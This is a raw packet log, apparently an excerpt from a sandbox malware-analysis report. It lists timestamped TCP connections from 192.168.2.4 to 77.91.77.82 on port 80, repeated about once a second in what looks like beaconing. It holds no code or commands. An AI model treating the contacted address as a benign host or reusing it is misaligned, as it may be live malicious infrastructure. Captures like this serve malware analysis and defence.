                    Jul 5, 2024 05:10:31.373147964 CEST4976280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.373467922 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.378215075 CEST804976377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:31.378303051 CEST804976277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:31.378304958 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.378350973 CEST4976280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.378473043 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.383281946 CEST804976377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:32.081392050 CEST804976377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:32.081474066 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.082113028 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.086890936 CEST804976377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:32.302418947 CEST804976377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:32.302470922 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.404624939 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.405019045 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.409820080 CEST804976477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:32.409883022 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.409928083 CEST804976377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:32.409974098 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.410147905 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.415070057 CEST804976477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:33.105979919 CEST804976477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:33.106899977 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.107883930 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.112646103 CEST804976477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:33.325151920 CEST804976477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:33.325234890 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.436224937 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.436466932 CEST4976580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.441250086 CEST804976477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:33.441262960 CEST804976577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:33.441370010 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.441462040 CEST4976580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.441559076 CEST4976580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.446265936 CEST804976577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:34.161181927 CEST804976577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:34.161241055 CEST4976580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:34.163031101 CEST4976580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:34.167851925 CEST804976577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:34.385121107 CEST804976577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:34.385175943 CEST4976580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:34.509430885 CEST4976580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:34.509737968 CEST4976680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:34.514545918 CEST804976677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:34.514631033 CEST4976680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:34.514861107 CEST804976577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:34.514909983 CEST4976580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:34.518975973 CEST4976680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:34.523749113 CEST804976677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:35.233439922 CEST804976677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:35.233495951 CEST4976680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:35.234164000 CEST4976680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:35.238955021 CEST804976677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:35.455430031 CEST804976677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:35.455482960 CEST4976680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:35.560722113 CEST4976680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:35.561019897 CEST4976780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:35.566751957 CEST804976777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:35.566766024 CEST804976677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:35.566831112 CEST4976680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:35.566847086 CEST4976780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:35.567018986 CEST4976780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:35.572933912 CEST804976777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:36.296036005 CEST804976777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:36.296113968 CEST4976780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:36.296833992 CEST4976780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:36.301594019 CEST804976777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:36.525865078 CEST804976777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:36.526853085 CEST4976780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:36.638838053 CEST4976780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:36.639157057 CEST4976880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:36.644045115 CEST804976877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:36.644074917 CEST804976777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:36.644175053 CEST4976780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:36.644188881 CEST4976880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:36.644284964 CEST4976880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:36.648981094 CEST804976877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:37.352226019 CEST804976877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:37.352288008 CEST4976880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:37.355459929 CEST4976880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:37.360276937 CEST804976877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:37.576417923 CEST804976877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:37.576468945 CEST4976880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:37.685817957 CEST4976880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:37.686211109 CEST4976980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:37.690985918 CEST804976977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:37.691003084 CEST804976877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:37.696104050 CEST4976880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:37.696115971 CEST4976980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:37.696398973 CEST4976980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:37.701102018 CEST804976977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:38.414021015 CEST804976977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:38.414086103 CEST4976980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:38.414747000 CEST4976980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:38.419547081 CEST804976977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:38.641179085 CEST804976977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:38.641247034 CEST4976980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:38.748678923 CEST4976980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:38.749017954 CEST4977080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:38.753706932 CEST804976977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:38.753757000 CEST4976980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:38.753772020 CEST804977077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:38.753884077 CEST4977080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:38.754026890 CEST4977080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:38.758718967 CEST804977077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:39.447379112 CEST804977077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:39.447463989 CEST4977080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:39.448174953 CEST4977080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:39.452899933 CEST804977077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:39.665680885 CEST804977077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:39.665853977 CEST4977080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:39.779584885 CEST4977080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:39.779830933 CEST4977180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:39.785422087 CEST804977177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:39.785495043 CEST4977180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:39.785593033 CEST4977180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:39.785873890 CEST804977077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:39.785927057 CEST4977080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:39.790483952 CEST804977177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:40.485183001 CEST804977177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:40.485239029 CEST4977180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:40.486037016 CEST4977180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:40.490989923 CEST804977177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:40.705621958 CEST804977177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:40.705739975 CEST4977180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:40.810906887 CEST4977180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:40.811151981 CEST4977280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:40.815910101 CEST804977277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:40.815982103 CEST4977280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:40.816066027 CEST4977280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:40.816219091 CEST804977177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:40.816274881 CEST4977180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:40.820802927 CEST804977277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:41.529180050 CEST804977277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:41.529261112 CEST4977280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:41.529983044 CEST4977280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:41.534739017 CEST804977277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:41.756166935 CEST804977277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:41.756341934 CEST4977280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:41.857635021 CEST4977280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:41.858057976 CEST4977380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:41.862802029 CEST804977277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:41.862968922 CEST804977377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:41.863039970 CEST4977280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:41.863086939 CEST4977380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:41.863178015 CEST4977380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:41.867913961 CEST804977377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:42.580399036 CEST804977377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:42.582849979 CEST4977380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:42.589514017 CEST4977380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:42.594862938 CEST804977377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:42.817280054 CEST804977377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:42.817361116 CEST4977380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:42.920149088 CEST4977380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:42.920434952 CEST4977480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:42.925162077 CEST804977477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:42.925260067 CEST4977480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:42.925442934 CEST4977480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:42.925467968 CEST804977377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:42.925522089 CEST4977380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:42.930196047 CEST804977477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:43.627463102 CEST804977477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:43.630847931 CEST4977480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:43.631434917 CEST4977480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:43.636260033 CEST804977477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:43.849529028 CEST804977477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:43.850858927 CEST4977480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:43.967016935 CEST4977480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:43.967479944 CEST4977580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:43.972289085 CEST804977577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:43.972332001 CEST804977477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:43.972364902 CEST4977580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:43.972393036 CEST4977480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:43.972579956 CEST4977580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:43.977334023 CEST804977577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:44.682857990 CEST804977577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:44.682914972 CEST4977580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:44.685906887 CEST4977580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:44.690686941 CEST804977577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:44.909461021 CEST804977577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:44.909528971 CEST4977580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:45.014987946 CEST4977580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:45.016833067 CEST4977680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:45.020148039 CEST804977577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:45.021687031 CEST804977677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:45.021748066 CEST4977580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:45.021780968 CEST4977680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:45.021903992 CEST4977680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:45.026592970 CEST804977677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:45.722275019 CEST804977677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:45.722357988 CEST4977680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:45.723231077 CEST4977680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:45.727977991 CEST804977677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:45.944767952 CEST804977677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:45.944848061 CEST4977680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:46.060758114 CEST4977680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:46.061122894 CEST4977780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:46.065923929 CEST804977677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:46.065937042 CEST804977777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:46.065994978 CEST4977680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:46.066044092 CEST4977780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:46.066132069 CEST4977780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:46.070831060 CEST804977777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:46.802546978 CEST804977777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:46.802630901 CEST4977780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:46.803257942 CEST4977780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:46.807996035 CEST804977777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:47.033916950 CEST804977777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:47.034091949 CEST4977780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:47.139033079 CEST4977780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:47.139393091 CEST4977880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:47.144197941 CEST804977877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:47.144299984 CEST4977880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:47.144381046 CEST804977777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:47.144500017 CEST4977880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:47.144522905 CEST4977780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:47.149292946 CEST804977877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:47.857371092 CEST804977877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:47.860400915 CEST4977880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:47.861205101 CEST4977880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:47.865950108 CEST804977877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:48.087090969 CEST804977877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:48.087161064 CEST4977880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:48.201361895 CEST4977880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:48.201745033 CEST4977980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:48.206322908 CEST804977877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:48.206382036 CEST4977880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:48.206532955 CEST804977977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:48.206603050 CEST4977980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:48.206718922 CEST4977980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:48.211426973 CEST804977977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:48.912866116 CEST804977977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:48.912945986 CEST4977980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:48.913644075 CEST4977980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:48.918508053 CEST804977977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:49.138216972 CEST804977977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:49.140086889 CEST4977980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:49.248334885 CEST4977980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:49.248662949 CEST4978080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:49.253424883 CEST804978077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:49.253710985 CEST804977977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:49.253796101 CEST4977980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:49.253915071 CEST4978080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:49.253915071 CEST4978080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:49.258676052 CEST804978077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:49.960004091 CEST804978077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:49.960092068 CEST4978080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:49.960800886 CEST4978080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:49.966240883 CEST804978077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:50.179233074 CEST804978077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:50.179346085 CEST4978080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:50.295861959 CEST4978080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:50.296324015 CEST4978180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:50.301139116 CEST804978177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:50.301196098 CEST4978180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:50.301281929 CEST804978077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:50.301326990 CEST4978180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:50.301376104 CEST4978080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:50.306087017 CEST804978177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:51.001724958 CEST804978177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:51.002876997 CEST4978180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:51.005486965 CEST4978180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:51.010332108 CEST804978177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:51.224138975 CEST804978177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:51.224261045 CEST4978180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:51.326591969 CEST4978180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:51.327074051 CEST4978280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:51.331739902 CEST804978177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:51.331839085 CEST804978277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:51.331886053 CEST4978180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:51.331918001 CEST4978280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:51.332046032 CEST4978280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:51.336812019 CEST804978277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:52.044487000 CEST804978277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:52.046947002 CEST4978280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:52.047466040 CEST4978280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:52.052175045 CEST804978277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:52.267561913 CEST804978277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:52.270962000 CEST4978280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:52.373469114 CEST4978280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:52.374017000 CEST4978380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:52.378504038 CEST804978277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:52.378559113 CEST4978280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:52.378823996 CEST804978377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:52.378904104 CEST4978380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:52.379122972 CEST4978380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:52.383856058 CEST804978377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:53.095915079 CEST804978377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:53.098879099 CEST4978380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:53.103115082 CEST4978380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:53.108062029 CEST804978377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:53.331283092 CEST804978377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:53.331340075 CEST4978380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:53.441581964 CEST4978380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:53.441893101 CEST4978480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:53.446832895 CEST804978377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:53.446847916 CEST804978477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:53.446898937 CEST4978380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:53.446933031 CEST4978480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:53.447033882 CEST4978480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:53.451754093 CEST804978477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:54.148936033 CEST804978477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:54.149020910 CEST4978480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:54.149723053 CEST4978480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:54.154474020 CEST804978477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:54.371426105 CEST804978477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:54.371490955 CEST4978480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:54.483879089 CEST4978480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:54.484457970 CEST4978580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:54.488969088 CEST804978477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:54.489017010 CEST4978480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:54.489244938 CEST804978577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:54.489321947 CEST4978580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:54.489471912 CEST4978580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:54.494160891 CEST804978577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:55.180836916 CEST804978577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:55.183017015 CEST4978580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:55.183578968 CEST4978580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:55.188323975 CEST804978577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:55.399924994 CEST804978577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:55.399982929 CEST4978580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:55.517847061 CEST4978580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:55.518253088 CEST4978680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:55.523080111 CEST804978677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:55.523178101 CEST4978680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:55.523212910 CEST804978577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:55.523296118 CEST4978580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:55.523468971 CEST4978680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:55.528188944 CEST804978677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:56.233320951 CEST804978677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:56.233414888 CEST4978680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:56.235898972 CEST4978680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:56.240623951 CEST804978677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:56.455529928 CEST804978677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:56.455702066 CEST4978680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:56.561100960 CEST4978680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:56.561539888 CEST4978780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:56.566201925 CEST804978677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:56.566267014 CEST804978777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:56.566271067 CEST4978680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:56.566328049 CEST4978780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:56.566483021 CEST4978780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:56.571307898 CEST804978777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:57.286765099 CEST804978777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:57.286967039 CEST4978780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:57.287595987 CEST4978780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:57.292375088 CEST804978777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:57.512305021 CEST804978777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:57.512355089 CEST4978780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:57.623377085 CEST4978780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:57.623737097 CEST4978880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:57.628532887 CEST804978877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:57.628545046 CEST804978777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:57.628599882 CEST4978880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:57.628623009 CEST4978780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:57.628817081 CEST4978880192.168.2.477.91.77.82
